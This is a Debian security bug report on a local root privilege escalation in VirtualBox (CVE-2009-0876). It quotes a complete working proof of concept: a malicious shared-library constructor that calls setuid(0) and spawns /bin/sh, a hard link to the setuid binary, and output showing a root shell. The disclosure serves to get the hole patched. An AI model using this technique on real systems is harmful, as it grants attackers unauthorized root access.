Package: virtualbox-ose Version: 2.1.4-dfsg-1 Severity: critical Tags: security patch
Hi, the following CVE (Common Vulnerabilities & Exposures) id was published for virtualbox-ose. CVE-2009-0876[0]: | Unspecified vulnerability in Sun xVM VirtualBox 2.0.0, 2.0.2, 2.0.4, | 2.0.6r39760, 2.1.0, 2.1.2, and 2.1.4r42893 on Linux allows local users | to gain privileges via unknown vectors related to "certain packages." Quoting SpanKY <vap...@gentoo.org>: "hardlinks on Linux preserve permission, including set*id bits, and can be created by non-root users. virtualbox attempts to perform some sanity checks on the dir the binary exists in (presumably to prevent privilege escalation), however that is done after the constructors in shared libs are run. that means any library a virtualbox binary links against is an attack vector. the constructor isnt the only attack vector ... you could also override any of the standard C library functions that virtualbox would call during its startup. like open() or stat() or ... there really isnt many workarounds available here if DT_RPATH:$ORIGIN is continued to be used. perhaps making a small dedicated partition (loopback or whatever) and storing the binaries on there because hardlinks cannot go across partitions. simple example: $ id -u 1002 $ cat test.c #include <unistd.h> #include <sys/syscall.h> __attribute__((constructor)) void awesome(void) { char *argv[] = { "sh", NULL }; extern char *environ; syscall(SYS_setuid, 0); syscall(SYS_execve, "/bin/sh", argv, environ); } $ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2 $ ls -l /opt/VirtualBox/VirtualBox -r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox $ ln /opt/VirtualBox/VirtualBox $ ls -l VirtualBox -r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox $ ./VirtualBox ./VirtualBox: /home/vapier/libdl.so.2: no version information available (required by ./VirtualBox) sh-4.0# whoami root" Upstream patches are available on: http://www.virtualbox.org/changeset/17171 http://www.virtualbox.org/changeset/17169 http://www.virtualbox.org/changeset/17168 Debian lenny is not affected by this problem as the binaries are not setuid 0. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0876 http://security-tracker.debian.net/tracker/CVE-2009-0876 -- Nico Golde - http://www.ngolde.de - n...@jabber.ccc.de - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted.
pgp9noS7oY8eY.pgp
Description: PGP signature